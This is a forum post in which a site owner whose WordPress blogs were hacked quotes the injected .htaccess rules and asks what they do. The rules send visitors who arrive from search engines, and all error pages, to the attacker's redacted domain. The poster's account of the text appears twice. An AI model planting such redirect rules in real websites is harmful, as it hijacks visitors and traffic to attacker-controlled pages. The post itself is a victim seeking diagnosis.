BlackBeret
Regular Member
- Jul 12, 2008
- 257
- 62
A couple of my blogs got hacked. They entered the following code in a couple of places:
The xxxxxxxxxxxxxxxxxxx is their domain name that I removed.
Most of the codes were in the wp-content folder and subfolders (plugins,themes).
I can't figure out what they are trying to do. It looks like they are trying to make a bunch of MFA sites with SE results. Or maybe redirect all the search engine traffic my site might have gotten to their site?
Any ideas?
Code:
RewriteEngine On
Options +FollowSymlinks
RewriteBase /
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://xxxxxxxxxxxxxx.com/v-web/index2.html [R=301,L]
ErrorDocument 401 http://xxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 403 http://xxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 404 http://xxxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 500 http://xxxxxxxxxxxxxxxxx.com/v-web/index2.html
The xxxxxxxxxxxxxxxxxxx is their domain name that I removed.
Most of the codes were in the wp-content folder and subfolders (plugins,themes).
I can't figure out what they are trying to do. It looks like they are trying to make a bunch of MFA sites with SE results. Or maybe redirect all the search engine traffic my site might have gotten to their site?
Any ideas?